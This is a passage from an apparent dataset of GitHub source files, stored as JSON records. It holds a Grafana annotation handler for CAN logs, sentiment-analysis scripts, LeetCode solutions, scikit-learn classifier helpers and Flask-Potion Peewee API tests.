annotation_req = json.loads(query_req)\n except ValueError as e:\n print(f\"Failed parse annotation: {query_req}\")\n return jsonify(res)\n\n if \"annotation\" not in annotation_req:\n print(f\"Unknown annotation {query_req}\")\n\n # Split / session annotations\n elif annotation_req[\"annotation\"] in [\"session\", \"split\"] and \"device\" in annotation_req:\n\n # Get time interval to annotate\n start_date, stop_date = parse_time_range(req[\"range\"][\"from\"], req[\"range\"][\"to\"])\n\n # Get log files in time interval\n log_files = canedge_browser.get_log_files(app.fs, annotation_req[\"device\"], start_date=start_date,\n stop_date=stop_date)\n\n for log_file in log_files:\n\n # Parse filename\n file_matches = re.match(\n r\"\\S?[0-9A-F]{8}/(?P\\d{8})/(?P\\d{8})(?:-[0-9A-F]{8}){0,1}\\.MF4$\",\n log_file,\n re.IGNORECASE)\n\n if not file_matches:\n continue\n\n session_no = file_matches.group(\"session_no\")\n split_no = file_matches.group(\"split_no\")\n\n # Only generate annotation if annotation is split or annotation is session with first split file\n if not ((annotation_req[\"annotation\"] == \"split\") or\n (annotation_req[\"annotation\"] == \"session\" and int(split_no, 10) == 1)):\n continue\n\n # Get file start time\n with app.fs.open(log_file, \"rb\") as handle:\n mdf_file = mdf_iter.MdfFile(handle)\n log_file_start_timestamp_ns = mdf_file.get_first_measurement()\n\n res.append({\n \"text\": f\"{log_file}\\n\"\n f\"Session: {int(session_no, 10)}\\n\"\n f\"Split: {int(split_no, 10)}\\n\"\n f\"Size: {app.fs.size(log_file) >> 20} MB\",\n \"time\": log_file_start_timestamp_ns / 1000000,\n })\n\n return jsonify(res)\n\n return annotations_cache(request.get_json())\n","repo_name":"AndrewA200112/CAN_Backend_logger","sub_path":"canedge-grafana-backend-main/canedge_datasource/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4542431695","text":"project = open('project_twitter_data.csv','r')\nresult = open('resulting_data.csv','w')\n\npunctuation_chars = [\"'\", '\"', \",\", \".\", \"!\", \":\", \";\", '#', '@']\n\ndef strip_punctuation(str1):\n for i in punctuation_chars:\n str1 = str(str1).replace('%s' % i, '')\n \n return str1\n\n# list of positive words to use\npositive_words = []\nwith open(\"positive_words.txt\") as pos_f:\n for lin in pos_f:\n if lin[0] != ';' and lin[0] != '\\n':\n 
positive_words.append(lin.strip())\npositive_words.append('#incredible')\n#print(positive_words)\ndef get_pos(str1):\n    #print(str1)\n    count = 0\n    stri = str1.lower()\n    lst = stri.split()\n    for item in lst:\n        #print(item)\n        if item in positive_words:\n            count = count + 1\n    return count\n\n\nnegative_words = []\nwith open(\"negative_words.txt\") as neg_f:\n    for lin in neg_f:\n        if lin[0] != ';' and lin[0] != '\\n':\n            negative_words.append(lin.strip())\nnegative_words.append('abrupt.')\n#print(negative_words)\ndef get_neg(str2):\n    #print(str2)\n    str2 = str2.lower()\n    counts = 0\n    new_ls = str2.split()\n    #print(new_ls)\n    for item in new_ls:\n        if item in negative_words:\n            counts = counts + 1\n    return counts\n\n\ndef results(result):\n    result.write('Number of Retweets, Number of Replies, Positive Score, Negative Score, Net Score')\n    result.write('\\n')\n    file = project.readlines()\n    header = file.pop(0)\n    for line in file:\n        lin = line.strip().split(',')\n        lins = strip_punctuation(lin[0])\n        result.write('{}, {}, {}, {}, {}'.format(lin[1],lin[2],get_pos(lins),get_neg(lins),(get_pos(lins)-get_neg(lins))))\n        result.write('\\n')\n\n\nresults(result)\nproject.close()\nresult.close()\n","repo_name":"Techno-Philes/Sentiment-Analysis","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"16097356349","text":"\"\"\"\nGiven a binary tree, determine whether it is a valid binary search tree (BST).\n\nAssume a BST has the following properties:\n\nThe left subtree of a node contains only values less than the node's value.\nThe right subtree of a node contains only values greater than the node's value.\nBoth the left and right subtrees must themselves be binary search trees.\nExample 1:\n\nInput:\n    2\n   / \\\n  1   3\nOutput: true\nExample 2:\n\nInput:\n    5\n   / \\\n  1   4\n     / \\\n    3   6\nOutput: false\nExplanation: the input is [5,1,4,null,null,3,6].\n     The root node's value is 5, but its right child's value is 4.\n\nSource: LeetCode\nLink: https://leetcode-cn.com/problems/validate-binary-search-tree\nCopyright belongs to LeetCode. Contact them for authorization before commercial reprints; cite the source for non-commercial reprints.\n\"\"\"\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    def isValidBST(self, root: TreeNode) -> bool:\n        ans = []\n        def recursion(root):\n            if not root: return\n            recursion(root.left)\n            ans.append(root.val)\n            recursion(root.right)\n        recursion(root)\n        # use a set to reject duplicates such as [1,1]\n        return ans == sorted(ans) and len(set(ans)) == len(ans)\n\n    def isValidBST(self, root: TreeNode) -> bool:\n        # iterative in-order traversal: the tree is a valid BST\n        # iff every node is strictly greater than its predecessor\n        p = root\n        pre = None\n        stack = []\n        while p or stack:\n            while p:\n                stack.append(p)\n                p = p.left\n            p = stack.pop()\n            if pre and p.val <= pre.val:\n                return False\n            pre = p\n            p = p.right\n        return True","repo_name":"algorithm004-02/algorithm004-02","sub_path":"Week 02/id_622/Leetcode-98-622.py","file_name":"Leetcode-98-622.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"40"}
+{"seq_id":"36337196196","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 07 10:02:35 2016\n\n@author: fanqi\n\"\"\"\n\nimport numpy as np\nfrom sklearn.datasets import make_classification\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pandas import DataFrame\nfrom sklearn.svm import LinearSVC, SVC\nfrom sklearn.learning_curve import learning_curve\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.datasets import make_circles\nnp.set_printoptions(precision=4, threshold=10000, linewidth=160, edgeitems=999, suppress=True)\n\ndef createdata():\n    X, y 
= make_classification(1000, n_features = 20, n_informative = 2, n_redundant = 2, n_classes = 2, random_state = 0)\n\n df = DataFrame( np.hstack((X, y[:, None])), columns = range(20) + ['class'] )\n return df\n\ndef preplot(df):\n _ = sns.pairplot(df[:50], vars = [8, 11, 12, 14, 19], hue = 'class', size = 1.5)\n plt.show()\n\n plt.figure(figsize = (12, 10))\n _ = sns.corrplot(df, annot = False)\n plt.show()\n\ndef plot_learning_curve(estimator, title, X, y, ylim = None, cv = None, train_sizes = np.linspace(0.1, 1.0, 5)):\n\n '''\n 画出data在某模型上的learning curve\n 参数解释\n -------------\n estimator:你用的分类器\n title:表格的标题\n X:输入的feature(numpy的array类型)\n y:输入的target vector\n ylim:tuple格式的(ymin, ymax),设定图像中纵坐标的最低点和最高点\n cv:做cross-validation的时候,数据分成的份数,其中一份作为cv集,其余n-1份作为training(默认为3份)\n -------------\n '''\n\n plt.figure()\n train_sizes, train_scores, test_scores = learning_curve(estimator, X, y, cv = 5, n_jobs = 1, train_sizes = train_sizes)\n train_scores_mean = np.mean(train_scores, axis = 1)\n train_scores_std = np.std(train_scores, axis = 1)\n test_scores_mean = np.mean(test_scores, axis = 1)\n test_scores_std = np.std(test_scores, axis = 1)\n\n plt.fill_between(train_sizes, train_scores_mean - train_scores_std, train_scores_mean + train_scores_std, alpha = 0.1, color = 'r')\n plt.fill_between(train_sizes, test_scores_mean - test_scores_std, test_scores_mean + test_scores_std, alpha = 0.1, color = 'g')\n plt.plot(train_sizes, train_scores_mean, 'o-', color = 'r', label = 'Training score')\n plt.plot(train_sizes, test_scores_mean, 'o-', color = 'g', label = 'Cross-validation score')\n\n plt.xlabel('Training examples')\n plt.ylabel('Score')\n plt.legend(loc = 'best')\n plt.grid('on')\n if ylim:\n plt.ylim(ylim)\n plt.title(title)\n plt.show()\n\n# plot_learning_curve(LinearSVC(C = 10.0), 'LinearSVC(C = 10.0)', X, y, ylim = (0.8, 1.01), train_sizes = np.linspace(0.05, 0.2, 5))\n# plot_learning_curve(LinearSVC(C = 10.0), 'LinearSVC(C = 10.0)', X, y, ylim = (0.8, 1.1), train_sizes = np.linspace(0.1, 1.0, 5))\n# plot_learning_curve(LinearSVC(C=10.0), \"LinearSVC(C=10.0) Features: 11&14\", X[:, [11, 14]], y, ylim=(0.8, 1.0), train_sizes=np.linspace(.05, 0.2, 5))\n# plot_learning_curve(Pipeline([('fs', SelectKBest(f_classif, k = 2)), ('svc', LinearSVC(C = 10.0))]), \\\n # 'SelectKBest(f_classif, k =2) + LinearSVC(C = 10.0)', X, y, ylim = (0.8, 1.0), train_sizes = np.linspace(0.05, 0.2, 5))\n# plot_learning_curve(LinearSVC(C = 0.1), 'LinearSVC(C = 0.1)', X, y, ylim = (0.8, 1.0), train_sizes = np.linspace(0.05, 0.2, 5))\n\n# estm = GridSearchCV(LinearSVC(), param_grid = {'C': [0.001, 0.01, 0.1, 1.0, 10.0]})\n# plot_learning_curve(estm, 'LinearSVC(C = AUTO)', X, y, ylim = (0.8, 1.0), train_sizes = np.linspace(0.05, 0.2, 5))\n# print 'Chosen parameter on 100 datapoints: %s' % estm.fit(X[:500], y[:500]).best_params_\n\n# plot_learning_curve(LinearSVC(C = 0.1, penalty = 'l1', dual = False), 'LinearSVC(C = 0.1, penalty = \"11\")', X, y, ylim = (0.8, 1.0), train_sizes = np.linspace(0.05, 0.2, 5))\n\n# estm = LinearSVC(C = 0.1, penalty = 'l1', dual = False)\n# estm.fit(X[:450], y[:450])\n# print 'Coefficients learned: %s' % estm.coef_\n# print 'Non-zero coefficients: %s' % np.nonzero(estm.coef_)[1]\n\nX, y = make_circles(n_samples = 1000, random_state = 2)\n# plot_learning_curve(LinearSVC(C = 0.25), 'LinearSVC(C = 0.25)', X, y, ylim = (0.4, 1.0), train_sizes = np.linspace(0.1, 1.0, 5))\ndf = DataFrame(np.hstack((X, y[:, None])), columns = range(2) + ['class'])\n_ = sns.pairplot(df, vars = [0, 1], hue = 'class', 
size = 3.5)\n\nX_extra = np.hstack((X, X[:, [0]] ** 2 + X[:, [1]] ** 2))\nplot_learning_curve(LinearSVC(C = 0.25), 'LinearSVC(C = 0.25) + distance feature', X_extra, y, ylim = (0.5, 1.0), train_sizes = np.linspace(0.1, 1.0, 5))\n\nplot_learning_curve(SVC(C = 2.5, kernel = 'rbf', gamma = 1.0), 'SVC(C = 2.5, kernel = \"rbf\", gamma = 1.0)', X, y, ylim = (0.5, 1.0), train_sizes = np.linspace(0.1, 1.0, 5))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Fansiee/my_Titanic","sub_path":"hanxiaoyang.py","file_name":"hanxiaoyang.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26528358524","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 11 23:11:07 2018\n\n@author: juliocesar\n\n\n\"\"\"\n\n# Libraries and Dependencies\n# -----------------------------------------------------------------------\n\nfrom sklearn.svm import LinearSVC #,SVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom xgboost.sklearn import XGBClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.preprocessing import MinMaxScaler\n\n\n# Global matrix variable\nX = None\n\n\n\n# Classifiers\n# -----------------------------------------------------------------------\n \n# SVM classifier\ndef svm(trl, trx, tsx, c):\n \"\"\"\n expecting two df with labels in col1 and 128 vec embedding\n takes label from first col name of df\n \"\"\"\n \n # Creating and training classifier \n classifier = LinearSVC(C = c).fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = classifier.predict(tsx)\n return prediction\n\n\n# Random Forest Classifier\ndef rndForest(trl, trx, tsx,ntrees):\n \n # Creating and training classifier \n clf = RandomForestClassifier(n_estimators = ntrees).fit(trx, trl)\n \n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\n\n# Logistic Regression Classifier\ndef logReg(trl, trx, tsx, c):\n\n # Creating and training classifier\n try:\n \n clf = LogisticRegression(C = c).fit(trx, trl.ravel())\n except: #if multiclass..\n clf = LogisticRegression(C = c, solver='newton-cg', multi_class='multinomial').fit(trx, trl.ravel())\n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\n\n# Extreme Gradient Boost Classifier\ndef xgboost(trl, trx, tsx, md, ss, cs):\n \n # Creating and training classifier\n clf = XGBClassifier( max_depth = md, subsample = ss,\n colsample_bytree = cs).fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\n\n# Linear Discriminant Analysis Classifier\ndef lda(trl, trx, tsx):\n \n # Creating and training classifier\n clf = LinearDiscriminantAnalysis().fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\n\n# Quadratic Discriminant Analysis Classifier\ndef qda(trl, trx, tsx):\n # Creating and training classifier\n clf = QuadraticDiscriminantAnalysis().fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = clf.predict(tsx) \n return prediction\n\n\n# Ada Boost Classifier\ndef adaboost(trl, trx, 
tsx, ne):\n\n # Creating and training classifier\n dt = DecisionTreeClassifier() \n clf = AdaBoostClassifier(n_estimators = ne, \n base_estimator = dt).fit(trx, trl.ravel())\n \n # Making prediction on test set\n prediction = clf.predict(tsx)\n return prediction\n\ndef naive_bayes(trl, trx, tsx):\n # Creating and training classifier\n scaler = MinMaxScaler()\n scaler.fit(trx)\n trx = scaler.fit_transform(trx)\n clf = MultinomialNB().fit(trx, trl.ravel())\n prediction = clf.predict(tsx)\n return prediction\n\ndef extra_trees(trl, trx, tsx, ne):\n #Creating and training classifier\n clf = ExtraTreesClassifier().fit(trx, trl.ravel())\n prediction = clf.predict(tsx)\n return prediction\n \n\n# Functions\n# -----------------------------------------------------------------------\n\n# Getter for global matrix\ndef getX():\n global X\n return X\n\n\n# Setter for global matrix\ndef setX(value):\n global X\n X = value\n \nclassifiers = [svm, rndForest, logReg, xgboost, lda, qda, adaboost]\n \n#def expt(classifiers):\n# \"\"\"\n# \"\"\"\n# for classifier in classifiers:\n# data = ","repo_name":"ajimenezjulio/text_classification","sub_path":"classifiersEdit.py","file_name":"classifiersEdit.py","file_ext":"py","file_size_in_byte":4066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28188013270","text":"class Solution:\n def reverseString(self, s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n \"\"\"\n length = len(s)\n count = 0\n while count< len(s):\n s.insert(length,s[0])\n s.remove(s[0])\n count +=1\n length -= 1\n ","repo_name":"CengizhanDeveci/Competetive-Programming","sub_path":"leetcode/344. Reverse String.py","file_name":"344. Reverse String.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"321111533","text":"import unittest\n\nimport peewee as pw\nfrom playhouse.fields import ManyToManyField\n\nfrom flask_potion import Api, fields\nfrom flask_potion.contrib.peewee import PeeweeManager\nfrom flask_potion.resource import ModelResource\nfrom flask_potion.routes import Relation\nfrom tests import BaseTestCase\nfrom tests.contrib.peewee import PeeweeTestDB\n\n\nclass PeeweeTestCase(BaseTestCase):\n def setUp(self):\n super(PeeweeTestCase, self).setUp()\n self.app.config['DATABASE'] = 'sqlite://'\n self.db = db = PeeweeTestDB(self.app)\n self.api = Api(self.app)\n\n class Type(db.Model):\n name = pw.CharField(max_length=60, null=False, unique=True)\n\n class Machine(db.Model):\n name = pw.CharField(max_length=60, null=False)\n wattage = pw.FloatField(null=True)\n type = pw.ForeignKeyField(Type, related_name='machines')\n\n self.db.database.connect()\n self.db.database.create_tables([Type, Machine])\n\n class MachineResource(ModelResource):\n class Meta:\n model = Machine\n include_id = True\n include_type = True\n manager = PeeweeManager\n\n class Schema:\n type = fields.ToOne('type')\n\n class TypeResource(ModelResource):\n class Meta:\n model = Type\n include_id = True\n include_type = True\n manager = PeeweeManager\n\n class Schema:\n machines = fields.ToMany(MachineResource)\n\n self.MachineResource = MachineResource\n self.TypeResource = TypeResource\n\n self.api.add_resource(MachineResource)\n self.api.add_resource(TypeResource)\n\n def tearDown(self):\n self.db.database.close()\n\n def test_field_discovery(self):\n self.assertEqual(\n set(self.MachineResource.schema.fields.keys()),\n 
{'$id', '$type', 'name', 'type', 'wattage'})\n self.assertEqual(\n set(self.TypeResource.schema.fields.keys()),\n {'$id', '$type', 'name', 'machines'})\n self.assertEqual(self.MachineResource.meta.name, 'machine')\n self.assertEqual(self.TypeResource.meta.name, 'type')\n\n def test_create_no_json(self):\n response = self.client.post('/machine', data='invalid')\n self.assert400(response)\n\n def test_create_json_string(self):\n response = self.client.post(\n '/machine', data='invalid', force_json=True)\n self.assert400(response)\n\n def test_conflict(self):\n response = self.client.post('/type', data={'name': 'foo'})\n self.assert200(response)\n\n response = self.client.post('/type', data={'name': 'foo'})\n self.assertStatus(response, 409)\n\n def test_create(self):\n response = self.client.post('/type', data={})\n self.assert400(response)\n self.assertEqual({\n 'errors': [\n {\n 'message': \"'name' is a required property\",\n 'path': [],\n 'validationOf': {\n 'required': [\n 'name'\n ]\n }\n }\n ],\n 'message': 'Bad Request',\n 'status': 400\n }, response.json)\n\n response = self.client.post('/type', data={'name': 'x-ray'})\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'type',\n 'machines': [],\n 'name': 'x-ray'},\n response.json)\n\n response = self.client.post(\n '/machine', data={'name': 'Irradiator I', 'type': 1})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/1'},\n 'wattage': None,\n 'name': 'Irradiator I'},\n response.json)\n\n response = self.client.post(\n '/machine', data={'name': 'Sol IV', 'type': 1, 'wattage': 1.23e45})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 2,\n '$type': 'machine',\n 'type': {'$ref': '/type/1'},\n 'wattage': 1.23e45,\n 'name': 'Sol IV'},\n response.json)\n\n response = self.client.get('/type/1')\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'type',\n 'machines': [\n {'$ref': '/machine/1'},\n {'$ref': '/machine/2'}],\n 'name': 'x-ray'},\n response.json)\n\n def test_get(self):\n def type_(i):\n return {\n '$id': i,\n '$type': 'type',\n 'name': 'Type-{}'.format(i),\n 'machines': []}\n\n for i in range(1, 10):\n response = self.client.post(\n '/type',\n data={'name': 'Type-{}'.format(i), 'machines': []})\n self.assert200(response)\n self.assertJSONEqual(type_(i), response.json)\n\n response = self.client.get('/type/{}'.format(i))\n self.assert200(response)\n self.assertJSONEqual(type_(i), response.json)\n\n response = self.client.get('/type')\n self.assert200(response)\n self.assertJSONEqual(\n [type_(i) for i in range(1, i + 1)],\n response.json)\n\n response = self.client.get('/type/{}'.format(i + 1))\n self.assert404(response)\n self.assertJSONEqual({\n 'item': {'$id': i + 1, '$type': 'type'},\n 'message': 'Not Found',\n 'status': 404},\n response.json)\n\n def test_pagination(self):\n for i in range(1, 51):\n response = self.client.post('/type', data={'name': 'T{}'.format(i)})\n self.assert200(response)\n\n response = self.client.get('/type')\n self.assert200(response)\n self.assertEqual('50', response.headers.get('X-Total-Count'))\n\n response = self.client.get('/type?where={\"name\": {\"$in\": [\"T1\", \"T5\", \"T6\"]}}')\n self.assert200(response)\n self.assertEqual('3', response.headers.get('X-Total-Count'))\n\n def test_update(self):\n response = self.client.post('/type', data={'name': 'T1'})\n self.assert200(response)\n\n response = self.client.post('/type', data={'name': 'T2'})\n self.assert200(response)\n\n response = 
self.client.post(\n '/machine', data={'name': 'Robot', 'type': 1})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/1'},\n 'wattage': None,\n 'name': 'Robot'},\n response.json)\n\n response = self.client.patch('/machine/1', data={})\n self.assert200(response)\n\n response = self.client.patch('/machine/1', data={'wattage': 10000})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/1'},\n 'wattage': 10000,\n 'name': 'Robot'},\n response.json)\n\n response = self.client.patch(\n '/machine/1', data={'type': {'$ref': '/type/2'}})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/2'},\n 'wattage': 10000,\n 'name': 'Robot'},\n response.json)\n\n response = self.client.patch('/machine/1', data={'type': None})\n self.assert400(response)\n self.assertJSONEqual({\n 'errors': [{\n 'message': 'None is not valid under any of the given schemas',\n 'path': [\n 'type'],\n 'validationOf': {\n 'anyOf': [{\n 'additionalProperties': False,\n 'properties': {\n '$ref': {\n 'pattern': '^\\\\/type\\\\/[^/]+$',\n 'type': 'string'}},\n 'type': 'object'}, {\n 'type': 'integer'}]}}],\n 'message': 'Bad Request',\n 'status': 400},\n response.json)\n\n response = self.client.patch('/machine/1', data={'name': 'Foo'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'machine',\n 'type': {'$ref': '/type/2'},\n 'wattage': 10000,\n 'name': 'Foo'},\n response.json)\n\n def test_delete(self):\n response = self.client.delete('/type/1')\n self.assert404(response)\n\n response = self.client.post(\n '/type', data={'name': 'Foo', 'machines': []})\n self.assert200(response)\n\n response = self.client.delete('/type/1')\n self.assertStatus(response, 204)\n\n response = self.client.delete('/type/1')\n self.assert404(response)\n\n\nclass PeeweeRelationTestCase(BaseTestCase):\n def setUp(self):\n super(PeeweeRelationTestCase, self).setUp()\n\n self.app.config['DATABASE'] = 'sqlite://'\n self.db = db = PeeweeTestDB(self.app)\n self.api = Api(self.app)\n\n class User(db.Model):\n parent = pw.ForeignKeyField('self', related_name='children',\n null=True)\n name = pw.CharField(max_length=60, null=False)\n\n class Group(db.Model):\n name = pw.CharField(max_length=60, null=False)\n members = ManyToManyField(User, related_name='memberships')\n\n db.database.connect()\n db.database.create_tables([\n User,\n Group,\n Group.members.get_through_model()])\n\n self.User = User\n self.Group = Group\n\n class UserResource(ModelResource):\n class Meta:\n model = User\n include_id = True\n include_type = True\n manager = PeeweeManager\n\n children = Relation('self')\n\n class GroupResource(ModelResource):\n class Meta:\n model = Group\n include_id = True\n include_type = True\n manager = PeeweeManager\n\n members = Relation('user')\n\n self.api.add_resource(UserResource)\n self.api.add_resource(GroupResource)\n\n def tearDown(self):\n self.db.database.drop_tables([\n self.Group.members.get_through_model(),\n self.Group,\n self.User])\n\n if not self.db.database.is_closed():\n self.db.database.close()\n\n def test_relationship_secondary(self):\n response = self.client.post('/group', data={'name': 'Foo'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'group',\n 'name': 'Foo'},\n response.json)\n\n response = self.client.post('/user', data={'name': 'Bar'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n 
'$type': 'user',\n 'name': 'Bar'},\n response.json)\n\n response = self.client.get('/group/1/members')\n self.assert200(response)\n self.assertJSONEqual([], response.json)\n\n response = self.client.post(\n '/group/1/members', data={'$ref': '/user/1'})\n self.assert200(response)\n self.assertJSONEqual({'$ref': '/user/1'}, response.json)\n\n response = self.client.get('/group/1/members')\n self.assert200(response)\n self.assertJSONEqual([{'$ref': '/user/1'}], response.json)\n\n def test_relationship_secondary_delete_missing(self):\n response = self.client.post('/group', data={\"name\": \"Foo\"})\n response = self.client.post('/user', data={\"name\": \"Bar\"})\n\n response = self.client.delete('/group/1/members/1')\n self.assertStatus(response, 204)\n\n def test_relationship_post(self):\n response = self.client.post('/user', data={'name': 'Foo'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 1,\n '$type': 'user',\n 'name': 'Foo'},\n response.json)\n\n response = self.client.post('/user', data={'name': 'Bar'})\n self.assert200(response)\n self.assertJSONEqual({\n '$id': 2,\n '$type': 'user',\n 'name': 'Bar'},\n response.json)\n\n response = self.client.post(\n '/user/1/children', data={'$ref': '/user/2'})\n self.assert200(response)\n self.assertJSONEqual({'$ref': '/user/2'}, response.json)\n\n def test_relationship_get(self):\n self.test_relationship_post()\n\n response = self.client.get('/user/1/children')\n self.assert200(response)\n self.assertJSONEqual([{'$ref': '/user/2'}], response.json)\n\n def test_relationship_delete(self):\n self.test_relationship_post()\n\n response = self.client.delete('/user/1/children/2')\n self.assertStatus(response, 204)\n\n response = self.client.get('/user/1/children')\n self.assert200(response)\n self.assertJSONEqual([], response.json)\n\n def test_relationship_pagination(self):\n response = self.client.post('/user', data={'name': 'Foo'})\n self.assert200(response)\n\n for i in range(2, 50):\n response = self.client.post('/user', data={'name': str(i)})\n self.assert200(response)\n response = self.client.post(\n '/user/1/children',\n data={'$ref': '/user/{}'.format(response.json['$id'])})\n self.assert200(response)\n\n response = self.client.get('/user/1/children')\n\n self.assert200(response)\n self.assertEqual('48', response.headers.get('X-Total-Count'))\n self.assertJSONEqual(\n [{'$ref': '/user/{}'.format(i)} for i in range(2, 22)],\n response.json)\n\n response = self.client.get('/user/1/children?page=3')\n self.assert200(response)\n self.assertEqual('48', response.headers.get('X-Total-Count'))\n self.assertJSONEqual(\n [{'$ref': '/user/{}'.format(i)} for i in range(42, 50)],\n response.json)\n","repo_name":"biosustain/potion","sub_path":"tests/contrib/peewee/test_manager_peewee.py","file_name":"test_manager_peewee.py","file_ext":"py","file_size_in_byte":14415,"program_lang":"python","lang":"en","doc_type":"code","stars":489,"dataset":"github-code","pt":"40"} +{"seq_id":"74630284281","text":"#Additional bonus points are awarded as per the rules described below.\n# Write a program that calculates the bonus points for the given number and outputs the total points including the bonus.\n#If the number is up to 100 inclusive, the bonus points are 5.\n#If the number is larger than 100, the bonus points are 20% of the number.\n#If the number is larger than 1000, the bonus points are 10% of the number.\n#Additional points are awarded as below (added separately from the described above):\n##For even numbers -> + 1 p.\n##For numbers, ending with 5 
-> + 2 p.\n\npoints = int(input())\nbonus = 0\n\nif points > 1000:\n bonus = 0.1 * points\nelif points > 100: #\"if the previous conditions were not true, then try this condition\"\n bonus = 0.2 * points\nelif points <= 100:\n bonus = 5\n\nif points % 2 == 0:\n bonus = bonus + 1\n\nif str(points).endswith('5'):\n bonus = bonus + 2\n\nprint(bonus)\nsum = bonus + points\nprint(sum)","repo_name":"astefa69/SoftUni_Python_Problems","sub_path":"Python_Basics_Course/02_if_else_statements/lab/06_bonus_score.py","file_name":"06_bonus_score.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16586659278","text":"\n# coding: utf-8\n\n# # Question_1\n\n# ### import lib\n\n# In[2]:\n\nfrom nltk.stem import WordNetLemmatizer\nimport numpy as np\nimport random\nfrom sklearn.linear_model import LogisticRegression as LGR\nfrom sklearn.cluster import KMeans\n\n\n# ### PreProcess data\n\n# In[3]:\n\n\"\"\"\ntrain_data includes 2400 samples, where each sample is a list including the\nelements which are the words in reviews.\n\ntrain_label includes 2400 samples which belongs to {0,1}, which is the label \nof train_data.\n\ntest_data has the same form as the train_data, while it has 600 sample.\n\ntest_label is the same as train_label.\n\"\"\"\ndef Split(filenames):\n\n train_data = []\n train_label = []\n test_data = []\n test_label = []\n root = \"sentiment labelled sentences/\"\n for filename in filenames:\n path = root + filename\n count = [1,1]\n punctuation = [\"!\",\"%\",\"&\",\"(\",\")\",\"+\",\".\",\":\",\";\",\"<\",\"=\",\">\",\"?\",\"*\",\",\",\"\\t\",\"\"]\n for line in open(path):\n if line[-1] == \"\\n\":\n line = line[:-1]\n a = int(line[-1])\n b=[]\n for word in line[:-1].split(' '):\n ##while word and word[-1] in punctuation:\n ##word = word[:-1]\n ##b.append(wordnet_lemmatizer.lemmatize(word.lower()))\n i = 0\n while i < len(word):\n if word[i] in punctuation:\n word = word[:i]+word[i+1:]\n else:\n i+=1\n c = word.lower()\n if c == \"and\" or c == \"or\" or c==\"\":\n continue\n b.append(c)\n if count[a] > 400:\n test_label.append(a)\n test_data.append(b)\n else:\n train_label.append(a)\n train_data.append(b)\n count[a]+=1\n return [train_data, train_label, test_data, test_label]\n\n\n# In[4]:\n\n[train_data, train_label, test_data, test_label] = Split([\"yelp_labelled.txt\",\"amazon_cells_labelled.txt\",\"imdb_labelled.txt\"])\n\n\n# ## Bag of Words \n\n# In[5]:\n\n\"\"\"\ndic is a dictionary where key is the word shows in train_data and the items\nof is a list with two elements, first one is the frequency of the key and \nsecond element is the index of the key in feature vector, which we will use\nafter.\n\"\"\"\ndef bagOfWord(data):\n dic = {}\n t = 0\n n = 0\n for dataset in data:\n for line in dataset:\n for word in line:\n if word in dic:\n dic[word][0] += 1\n elif t == 0:\n dic[word] = [1,n]\n n+=1\n t = 1\n return dic\n\n\n# In[6]:\n\nDic = bagOfWord([train_data, test_data])\nlen(Dic)\n\n\n# In[127]:\n\n\"\"\"Build feature vector.\"\"\"\ndef buildB(data, dic):\n data_b = []\n size_dic = len(dic)\n for line in data:\n temp = [0]*size_dic\n for word in line:\n if word in dic:\n temp[dic[word][1]]+=1.0\n data_b.append(np.array(temp))\n return data_b\n \n\n\n# In[128]:\n\nget_ipython().magic('time [train_data_b, test_data_b] = 